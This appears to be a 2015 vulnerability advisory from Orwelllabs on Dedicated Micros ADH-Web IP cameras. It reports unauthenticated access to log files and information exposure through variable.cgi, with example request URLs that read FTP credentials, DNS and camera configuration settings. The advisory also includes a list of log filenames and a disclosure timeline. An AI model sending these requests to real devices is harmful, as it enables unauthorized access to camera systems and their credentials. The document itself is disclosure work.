137 lines
No EOL
6.6 KiB
Text
137 lines
No EOL
6.6 KiB
Text
1. Adivisory Information
|
||
|
||
Title: ADH-Web Server IP-Cameras Improper Access Restrictions
|
||
EDB-ID: 38245
|
||
Advisory ID: OLSA-2015-0919
|
||
Advisory URL: http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html
|
||
Date published: 2015-09-19
|
||
Date of last update: 2016-02-15
|
||
Vendors contacted: Dedicated Micros
|
||
|
||
|
||
2. Vulnerability Information
|
||
|
||
Class: Information Exposure [CWE-200]
|
||
Impact: Access Control Bypass
|
||
Remotely Exploitable: Yes
|
||
Locally Exploitable: No
|
||
CVE Name: N/A
|
||
|
||
|
||
3. Vulnerability Description
|
||
|
||
Due to improper access restriction the ADH-Web device [1] allows a remote attacker to browse and access arbitrary files from the following directorie '/hdd0/logs'. You can also get numerous information (important for a fingerprint step) via the parameter variable in variable.cgi script [2].
|
||
|
||
Background:
|
||
|
||
Dedicated Micros’ ground breaking Closed IPTV solution makes deploying an IP Video, CCTV system safe, secure and simple. Combining patent-pending innovation with zeroconf networking technology, Closed IPTV automatically allocates IP addresses to IP cameras by physical port. In this way the system is completely deterministic, creating firewalls and monitoring IP connections by individual network ports so they cannot be hacked or intercepted. This ground breaking solution provides a very simple and secure answer to IP Video, meaning that no prior knowledge of IP networking is required. Sophisticated and Dependable network security can be achieved with a single click.
|
||
|
||
|
||
4. Vulnerable Packages
|
||
|
||
- SD Advanced Closed IPTV
|
||
- SD Advanced
|
||
- EcoSense
|
||
- Digital Sprite 2
|
||
|
||
|
||
5. Technical Description
|
||
|
||
[1] Usually this directory can be protected against unauthenticated access (401 Unauthorized), though, it can access all files directly without requiring authentication.As in the statement below:
|
||
|
||
(401): http://<target_ip>/hdd0/logs
|
||
(200): http://<target_ip>/hdd0/logs/log.txt
|
||
|
||
> Most common logfiles:
|
||
|
||
arc_log.txt
|
||
bak.txt
|
||
connect.txt
|
||
log.txt
|
||
seclog.log
|
||
startup.txt
|
||
DBGLOG.TXT
|
||
access.txt
|
||
security.txt
|
||
|
||
[2] Another problem identified is an information exposure via the parameter variable in variable.cgi script. Knowing some variables can extract a reasonable amount of information:
|
||
|
||
> DNS:
|
||
http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0
|
||
|
||
> ftp master ftp console credentials:
|
||
http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
|
||
http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
|
||
|
||
(although the vast majority of servers have ftp/telnet with anonymous access allowed.)
|
||
|
||
> alms
|
||
http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0
|
||
|
||
> camconfig
|
||
http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1
|
||
(includes, but is not limited to)
|
||
|
||
This servers also sends credentials (and other sensitive data) via GET parameters, this is poor practice as the URL is liable to be logged in any number of places between the customer and the camera. The credentials should be passed in the body of a POST request (under SSL of course, here is not the case). . (Is possible to create, edit and delete users and other configurations in this way, very dangerous CSRF vectors).
|
||
|
||
|
||
6. Vendor Information, Solutions and Workarounds
|
||
|
||
The vendor found that some things are not vulnerabilities (sensitive information via GET, for example) and others are useless (hardcoded credentials) and others are not yet so critical (access to server logs). I think that at least this information can assist during an intrusion test, as will be shown soon.
|
||
|
||
|
||
7. Credits
|
||
These vulnerabilities has been discovered by Orwelllabs.
|
||
|
||
|
||
8. Report Timeline
|
||
|
||
2015-08-31: Vendor has been notified about the vulnerabilities (without details yet).
|
||
2015-09-01: Vendor acknowledges the receipt of the email and asks for technical details.
|
||
2015-09-01: A email with technical details is sent to vendor.
|
||
2015-09-11: Still no response, another email was sent to the Vendor requesting any opinion on the reported problems.
|
||
2015-09-11: The vendor reported that the matter was passed on to the team developed and that it would contact me the following week (2015-09-14).
|
||
|
||
2015-09-14: The development team responded by passing its consideration of the points andreported in accordance with this response the impact of these vulnerabilities is low and are no longer available unauthenticated using recent software release (version 10212).
|
||
|
||
|
||
Legal Notices
|
||
+++++++++++++
|
||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||
I accept no responsibility for any damage caused by the use or misuse of this information.
|
||
|
||
|
||
About Orwelllabs
|
||
++++++++++++++++
|
||
Orwelllabs is a security research lab interested in embedded device & webapp hacking.
|
||
We aims to create some intelligence around this vast and confusing picture that is the Internet of things.
|
||
|
||
|
||
-----BEGIN PGP PUBLIC KEY BLOCK-----
|
||
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
|
||
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
|
||
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
|
||
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
|
||
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
|
||
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
|
||
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
|
||
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
|
||
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
|
||
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
|
||
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
|
||
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
|
||
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
|
||
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
|
||
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
|
||
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
|
||
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
|
||
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
|
||
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
|
||
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
|
||
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
|
||
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
|
||
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
|
||
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
|
||
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
|
||
=IZYl
|
||
-----END PGP PUBLIC KEY BLOCK----- |